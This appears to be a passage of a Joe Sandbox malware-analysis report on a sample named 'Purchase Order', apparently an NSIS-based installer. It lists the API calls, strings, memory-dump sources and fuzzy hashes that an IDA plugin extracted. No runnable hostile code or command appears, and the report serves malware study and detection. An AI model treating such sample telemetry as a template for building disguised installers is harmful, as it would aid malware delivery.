                                                                                                  • ShowWindow.USER32(?,00000008), ref: 0040539C
                                                                                                  • GetDlgItem.USER32(?,000003EC), ref: 004053BD
                                                                                                  • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 004053CD
                                                                                                  • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004053E6
                                                                                                  • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 004053F2
                                                                                                  • GetDlgItem.USER32(?,000003F8), ref: 004052CB
                                                                                                    • Part of subcall function 00404111: SendMessageA.USER32(00000028,?,00000001,00403F42), ref: 0040411F
                                                                                                  • GetDlgItem.USER32(?,000003EC), ref: 0040540E
                                                                                                  • CreateThread.KERNEL32(00000000,00000000,Function_000051E2,00000000), ref: 0040541C
                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00405423
                                                                                                  • ShowWindow.USER32(00000000), ref: 00405446
                                                                                                  • ShowWindow.USER32(?,00000008), ref: 0040544D
                                                                                                  • ShowWindow.USER32(00000008), ref: 00405493
                                                                                                  • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004054C7
                                                                                                  • CreatePopupMenu.USER32 ref: 004054D8
                                                                                                  • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 004054ED
                                                                                                  • GetWindowRect.USER32(?,000000FF), ref: 0040550D
                                                                                                  • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405526
                                                                                                  • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405562
                                                                                                  • OpenClipboard.USER32(00000000), ref: 00405572
                                                                                                  • EmptyClipboard.USER32 ref: 00405578
                                                                                                  • GlobalAlloc.KERNEL32(00000042,?), ref: 00405581
                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 0040558B
                                                                                                  • SendMessageA.USER32(?,0000102D,00000000,?), ref: 0040559F
                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 004055B8
                                                                                                  • SetClipboardData.USER32(00000001,00000000), ref: 004055C3
                                                                                                  • CloseClipboard.USER32 ref: 004055C9
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3360575943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.3360559712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3360593659.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3360610483.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3360633168.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                  • String ID:
                                                                                                  • API String ID: 590372296-0
                                                                                                  • Opcode ID: c64a89a41c0802a74bba5a78dd280d07ec270940df5a5324a2dbd363d8ad6a15
                                                                                                  • Instruction ID: e0dc4773203ce2f112709eab9a11bfc184f4d069c8d5349c47d5b80479340f4b
                                                                                                  • Opcode Fuzzy Hash: c64a89a41c0802a74bba5a78dd280d07ec270940df5a5324a2dbd363d8ad6a15
                                                                                                  • Instruction Fuzzy Hash: 10A148B1900208BFDF119F60DD89AAE7BB9FB48355F00407AFA01B61A0C7B55E51DF69
                                                                                                  APIs
                                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403C45
                                                                                                  • ShowWindow.USER32(?), ref: 00403C62
                                                                                                  • DestroyWindow.USER32 ref: 00403C76
                                                                                                  • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403C92
                                                                                                  • GetDlgItem.USER32(?,?), ref: 00403CB3
                                                                                                  • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403CC7
                                                                                                  • IsWindowEnabled.USER32(00000000), ref: 00403CCE
                                                                                                  • GetDlgItem.USER32(?,00000001), ref: 00403D7C
                                                                                                  • GetDlgItem.USER32(?,00000002), ref: 00403D86
                                                                                                  • SetClassLongA.USER32(?,000000F2,?), ref: 00403DA0
                                                                                                  • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403DF1
                                                                                                  • GetDlgItem.USER32(?,00000003), ref: 00403E97
                                                                                                  • ShowWindow.USER32(00000000,?), ref: 00403EB8
                                                                                                  • EnableWindow.USER32(?,?), ref: 00403ECA
                                                                                                  • EnableWindow.USER32(?,?), ref: 00403EE5
                                                                                                  • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403EFB
                                                                                                  • EnableMenuItem.USER32(00000000), ref: 00403F02
                                                                                                  • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403F1A
                                                                                                  • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403F2D
                                                                                                  • lstrlenA.KERNEL32(0041FD30,?,0041FD30,00422F20), ref: 00403F56
                                                                                                  • SetWindowTextA.USER32(?,0041FD30), ref: 00403F65
                                                                                                  • ShowWindow.USER32(?,0000000A), ref: 00404099
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3360575943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.3360559712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3360593659.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3360610483.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3360633168.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                                                                  • String ID:
                                                                                                  • API String ID: 184305955-0
                                                                                                  • Opcode ID: f52cdbaf3123b7cbd9944adc9014d9948be0515c381cedadf67d37a6be0de08c
                                                                                                  • Instruction ID: 2eb83949b6bd8974722fa043abbaf2d62199bae10e2b8edc7fb886fd11b27e7e
                                                                                                  • Opcode Fuzzy Hash: f52cdbaf3123b7cbd9944adc9014d9948be0515c381cedadf67d37a6be0de08c
                                                                                                  • Instruction Fuzzy Hash: 3EC1F2B1604201BBDB20AF61EE84E2B3ABCFB84305F51053EF611B11E1C7799842EB5E
                                                                                                  APIs
                                                                                                  • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 004042B0
                                                                                                  • GetDlgItem.USER32(00000000,000003E8), ref: 004042C4
                                                                                                  • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 004042E2
                                                                                                  • GetSysColor.USER32(?), ref: 004042F3
                                                                                                  • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00404302
                                                                                                  • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00404311
                                                                                                  • lstrlenA.KERNEL32(?), ref: 00404314
                                                                                                  • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00404323
                                                                                                  • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 00404338
                                                                                                  • GetDlgItem.USER32(?,0000040A), ref: 0040439A
                                                                                                  • SendMessageA.USER32(00000000), ref: 0040439D
                                                                                                  • GetDlgItem.USER32(?,000003E8), ref: 004043C8
                                                                                                  • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 00404408
                                                                                                  • LoadCursorA.USER32(00000000,00007F02), ref: 00404417
                                                                                                  • SetCursor.USER32(00000000), ref: 00404420
                                                                                                  • ShellExecuteA.SHELL32(0000070B,open,004226C0,00000000,00000000,00000001), ref: 00404433
                                                                                                  • LoadCursorA.USER32(00000000,00007F00), ref: 00404440
                                                                                                  • SetCursor.USER32(00000000), ref: 00404443
                                                                                                  • SendMessageA.USER32(00000111,00000001,00000000), ref: 0040446F
                                                                                                  • SendMessageA.USER32(00000010,00000000,00000000), ref: 00404483
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3360575943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.3360559712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3360593659.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3360610483.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3360633168.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                                                  • String ID: N$open
                                                                                                  • API String ID: 3615053054-904208323
                                                                                                  • Opcode ID: e76cc1a0ba7ef7f86ae8e4ee464b0340797726a5bea064de8fa3a19247962d01
                                                                                                  • Instruction ID: 93f755629d35b640548b5af6b7c61ab120d2ba211fed136cde477a70902604c8
                                                                                                  • Opcode Fuzzy Hash: e76cc1a0ba7ef7f86ae8e4ee464b0340797726a5bea064de8fa3a19247962d01
                                                                                                  • Instruction Fuzzy Hash: 5D61A3B1A40209BFEB109F61DC45F6A7B69FB84714F10803AFB057A2D1C7B8A951CF99
                                                                                                  APIs
                                                                                                    • Part of subcall function 00406290: GetModuleHandleA.KERNEL32(?,?,?,00403329,00000009), ref: 004062A2
                                                                                                    • Part of subcall function 00406290: GetProcAddress.KERNEL32(00000000,?), ref: 004062BD
                                                                                                  • lstrcatA.KERNEL32(0042A000,0041FD30,80000001,Control Panel\Desktop\ResourceLocale,00000000,0041FD30,00000000,00000002,75923410,0042A400,00429000,00000000), ref: 004038F2
                                                                                                  • lstrlenA.KERNEL32(004226C0,?,?,?,004226C0,00000000,00429400,0042A000,0041FD30,80000001,Control Panel\Desktop\ResourceLocale,00000000,0041FD30,00000000,00000002,75923410), ref: 00403967
                                                                                                  • lstrcmpiA.KERNEL32(?,.exe), ref: 0040397A
                                                                                                  • GetFileAttributesA.KERNEL32(004226C0), ref: 00403985
                                                                                                  • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,00429400), ref: 004039CE
                                                                                                    • Part of subcall function 00405E55: wsprintfA.USER32 ref: 00405E62
                                                                                                  • RegisterClassA.USER32(00422EC0), ref: 00403A0B
                                                                                                  • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403A23
                                                                                                  • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403A58
                                                                                                  • ShowWindow.USER32(00000005,00000000), ref: 00403A8E
                                                                                                  • GetClassInfoA.USER32(00000000,RichEdit20A,00422EC0), ref: 00403ABA
                                                                                                  • GetClassInfoA.USER32(00000000,RichEdit,00422EC0), ref: 00403AC7
                                                                                                  • RegisterClassA.USER32(00422EC0), ref: 00403AD0
                                                                                                  • DialogBoxParamA.USER32(?,00000000,00403C09,00000000), ref: 00403AEF
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3360575943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.3360559712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3360593659.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3360610483.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3360633168.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                  • String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                                  • API String ID: 1975747703-2904746566
                                                                                                  • Opcode ID: acb9e1483f64e376554eea66f981f1d844e256060aa5afb508f73614915c59b6
                                                                                                  • Instruction ID: 29345e8072be8e75dc90901d6125d60d13300850aec60374d900494af90ecb47
                                                                                                  • Opcode Fuzzy Hash: acb9e1483f64e376554eea66f981f1d844e256060aa5afb508f73614915c59b6
                                                                                                  • Instruction Fuzzy Hash: 8161A4B06442407ED620AF65AD45F373A6CEB8474AF40447FF945B22E2C6BCAD029A3D
                                                                                                  APIs
                                                                                                  • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                  • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                  • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                  • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                  • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                  • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                  • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                                                  • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                  • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                  • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                  • DrawTextA.USER32(00000000,00422F20,000000FF,00000010,00000820), ref: 00401156
                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                  • DeleteObject.GDI32(?), ref: 00401165
                                                                                                  • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3360575943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.3360559712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3360593659.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3360610483.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3360633168.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                  • String ID: F
                                                                                                  • API String ID: 941294808-1304234792
                                                                                                  • Opcode ID: 7c104425433eee9aa72c8594e5c9845c7e8c7dbb4814f5ad4226ea4ba1dd0cf1
                                                                                                  • Instruction ID: f6076547c65416f673289c9e9aa760257b54fe90aa12de16c0a46004740ece36
                                                                                                  • Opcode Fuzzy Hash: 7c104425433eee9aa72c8594e5c9845c7e8c7dbb4814f5ad4226ea4ba1dd0cf1
                                                                                                  • Instruction Fuzzy Hash: C2419B71804249AFCF058FA4CD459AFBBB9FF45310F00812AF961AA1A0C738EA50DFA5
                                                                                                  APIs
                                                                                                  • lstrcpyA.KERNEL32(00421AC0,NUL,?,00000000,?,00000000,00405DD3,?,?), ref: 00405C4F
                                                                                                  • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,00405DD3,?,?), ref: 00405C73
                                                                                                  • GetShortPathNameA.KERNEL32(?,00421AC0,00000400), ref: 00405C7C
                                                                                                    • Part of subcall function 00405ACF: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405D2C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405ADF
                                                                                                    • Part of subcall function 00405ACF: lstrlenA.KERNEL32(00000000,?,00000000,00405D2C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B11
                                                                                                  • GetShortPathNameA.KERNEL32(00421EC0,00421EC0,00000400), ref: 00405C99
                                                                                                  • wsprintfA.USER32 ref: 00405CB7
                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,00421EC0,C0000000,00000004,00421EC0,?,?,?,?,?), ref: 00405CF2
                                                                                                  • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405D01
                                                                                                  • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D39
                                                                                                  • SetFilePointer.KERNEL32(004093C8,00000000,00000000,00000000,00000000,004216C0,00000000,-0000000A,004093C8,00000000,[Rename],00000000,00000000,00000000), ref: 00405D8F
                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 00405DA0
                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405DA7
                                                                                                    • Part of subcall function 00405B6A: GetFileAttributesA.KERNEL32(00000003,00402D8D,0042AC00,80000000,00000003), ref: 00405B6E
                                                                                                    • Part of subcall function 00405B6A: CreateFileA.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B90
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3360575943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.3360559712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3360593659.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3360610483.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3360633168.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
                                                                                                  • String ID: %s=%s$NUL$[Rename]
                                                                                                  • API String ID: 222337774-4148678300
                                                                                                  • Opcode ID: 2e3f1d5478f9f0c6b3014663fcb7d6cbfaa562a2a519d3499902ae05c7337469
                                                                                                  • Instruction ID: 58b8e60db813422e8a8f05baf12fe1cb7cc397f7baf35d3febd204dd1aeecf15
                                                                                                  • Opcode Fuzzy Hash: 2e3f1d5478f9f0c6b3014663fcb7d6cbfaa562a2a519d3499902ae05c7337469
                                                                                                  • Instruction Fuzzy Hash: D031C271A04B596BD2202B219D49F6B3A6CDF85754F18003BF901F62D2E67CA8018EAD
                                                                                                  APIs
                                                                                                  • GetDlgItem.USER32(?,000003FB), ref: 00404569
                                                                                                  • SetWindowTextA.USER32(00000000,?), ref: 00404593
                                                                                                  • SHBrowseForFolderA.SHELL32(?,0041F108,?), ref: 00404644
                                                                                                  • CoTaskMemFree.OLE32(00000000), ref: 0040464F
                                                                                                  • lstrcmpiA.KERNEL32(004226C0,0041FD30), ref: 00404681
                                                                                                  • lstrcatA.KERNEL32(?,004226C0), ref: 0040468D
                                                                                                  • SetDlgItemTextA.USER32(?,000003FB,?), ref: 0040469F
                                                                                                    • Part of subcall function 004056D1: GetDlgItemTextA.USER32(?,?,00000400,004046D6), ref: 004056E4
                                                                                                    • Part of subcall function 00406162: CharNextA.USER32(?,*?|<>/":,00000000,00429000,75923410,0042A400,00000000,0040329A,0042A400,0042A400,004034AF), ref: 004061BA
                                                                                                    • Part of subcall function 00406162: CharNextA.USER32(?,?,?,00000000), ref: 004061C7
                                                                                                    • Part of subcall function 00406162: CharNextA.USER32(?,00429000,75923410,0042A400,00000000,0040329A,0042A400,0042A400,004034AF), ref: 004061CC
                                                                                                    • Part of subcall function 00406162: CharPrevA.USER32(?,?,75923410,0042A400,00000000,0040329A,0042A400,0042A400,004034AF), ref: 004061DC
                                                                                                  • GetDiskFreeSpaceA.KERNEL32(0041ED00,?,?,0000040F,?,0041ED00,0041ED00,?,00000001,0041ED00,?,?,000003FB,?), ref: 0040475D
                                                                                                  • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404778
                                                                                                    • Part of subcall function 004048D1: lstrlenA.KERNEL32(0041FD30,0041FD30,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004047EC,000000DF,00000000,00000400,?), ref: 0040496F
                                                                                                    • Part of subcall function 004048D1: wsprintfA.USER32 ref: 00404977
                                                                                                    • Part of subcall function 004048D1: SetDlgItemTextA.USER32(?,0041FD30), ref: 0040498A
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3360575943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.3360559712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3360593659.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3360610483.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3360633168.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                  • String ID: A
                                                                                                  • API String ID: 2624150263-3554254475
                                                                                                  • Opcode ID: 4bae8adfc2f1ad16f51c5b997e9d1a132689266bb2bfdcf495d627e6f055046e
                                                                                                  • Instruction ID: 7ea719a0b93bcaca37b111b678a2b5d6f3f78fc0ed79788128ac85d93e839f9f
                                                                                                  • Opcode Fuzzy Hash: 4bae8adfc2f1ad16f51c5b997e9d1a132689266bb2bfdcf495d627e6f055046e
                                                                                                  • Instruction Fuzzy Hash: D5A18EB1900209ABDB11AFA5CC45AAFB7B8EF85314F10843BF711B62D1D77C8A418F69
                                                                                                  APIs
                                                                                                  • GetTickCount.KERNEL32 ref: 00402D5E
                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,0042AC00,00000400), ref: 00402D7A
                                                                                                    • Part of subcall function 00405B6A: GetFileAttributesA.KERNEL32(00000003,00402D8D,0042AC00,80000000,00000003), ref: 00405B6E
                                                                                                    • Part of subcall function 00405B6A: CreateFileA.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B90
                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,0042B000,00000000,00429C00,00429C00,0042AC00,0042AC00,80000000,00000003), ref: 00402DC3
                                                                                                  • GlobalAlloc.KERNEL32(00000040,00409130), ref: 00402F0A
                                                                                                  Strings
                                                                                                  • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402FA1
                                                                                                  • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402F53
                                                                                                  • Null, xrefs: 00402E43
                                                                                                  • Error launching installer, xrefs: 00402D9A
                                                                                                  • soft, xrefs: 00402E3A
                                                                                                  • Inst, xrefs: 00402E31
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3360575943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.3360559712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3360593659.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3360610483.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3360633168.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                  • String ID: Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                                                                  • API String ID: 2803837635-3016655952
                                                                                                  • Opcode ID: 6949a2dc81abe6ae8ca3848ee1a274e905e25326872c2b53de3725809208b6fc
                                                                                                  • Instruction ID: 1e54d23c6bd4663b885b54a46d63d50a2b02afe17d1d0705d7bda66adc4b1b0c
                                                                                                  • Opcode Fuzzy Hash: 6949a2dc81abe6ae8ca3848ee1a274e905e25326872c2b53de3725809208b6fc
                                                                                                  • Instruction Fuzzy Hash: 6661E5B1A40215ABDF20AF64DE89A9E76B8EB04355F11413FF904B72C1C7BC9D418B9C
                                                                                                  APIs
                                                                                                  • GetVersion.KERNEL32(?,0041F510,00000000,00405148,0041F510,00000000), ref: 00405FCA
                                                                                                  • GetSystemDirectoryA.KERNEL32(004226C0,00000400), ref: 00406045
                                                                                                  • GetWindowsDirectoryA.KERNEL32(004226C0,00000400), ref: 00406058
                                                                                                  • SHGetSpecialFolderLocation.SHELL32(?,00000000), ref: 00406094
                                                                                                  • SHGetPathFromIDListA.SHELL32(00000000,004226C0), ref: 004060A2
                                                                                                  • CoTaskMemFree.OLE32(00000000), ref: 004060AD
                                                                                                  • lstrcatA.KERNEL32(004226C0,\Microsoft\Internet Explorer\Quick Launch), ref: 004060CF
                                                                                                  • lstrlenA.KERNEL32(004226C0,?,0041F510,00000000,00405148,0041F510,00000000), ref: 00406121
                                                                                                  Strings
                                                                                                  • \Microsoft\Internet Explorer\Quick Launch, xrefs: 004060C9
                                                                                                  • Software\Microsoft\Windows\CurrentVersion, xrefs: 00406014
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3360575943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.3360559712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3360593659.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3360610483.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3360633168.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                                  • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                  • API String ID: 900638850-730719616
                                                                                                  • Opcode ID: ecdefe2751fc2be78af5e26724b3c6b53ae81c07b092af95d9830a7abdf9c2ab
                                                                                                  • Instruction ID: 17f1afa1df4653d6aa239bb2462815deac18f6a32033811d9d8cd7bf3bfa2e02
                                                                                                  • Opcode Fuzzy Hash: ecdefe2751fc2be78af5e26724b3c6b53ae81c07b092af95d9830a7abdf9c2ab
                                                                                                  • Instruction Fuzzy Hash: 68613671A00111AEDF209F24CC84BBF3BA8EB45314F12813BE942BA2D1D77D4962DB5E
                                                                                                  APIs
                                                                                                  • GetWindowLongA.USER32(?,000000EB), ref: 00404160
                                                                                                  • GetSysColor.USER32(00000000), ref: 0040417C
                                                                                                  • SetTextColor.GDI32(?,00000000), ref: 00404188
                                                                                                  • SetBkMode.GDI32(?,?), ref: 00404194
                                                                                                  • GetSysColor.USER32(?), ref: 004041A7
                                                                                                  • SetBkColor.GDI32(?,?), ref: 004041B7
                                                                                                  • DeleteObject.GDI32(?), ref: 004041D1
                                                                                                  • CreateBrushIndirect.GDI32(?), ref: 004041DB
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3360575943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.3360559712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3360593659.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3360610483.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3360633168.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                  • String ID:
                                                                                                  • API String ID: 2320649405-0
                                                                                                  • Opcode ID: e8c91e704ef8b2f1a11ad189bfd14f771d09f9d58710722270f9777396a44b4e
                                                                                                  • Instruction ID: 7122de99037e03f190bb62226e04253736cb74e6c142f140589d3e5d77d1f23d
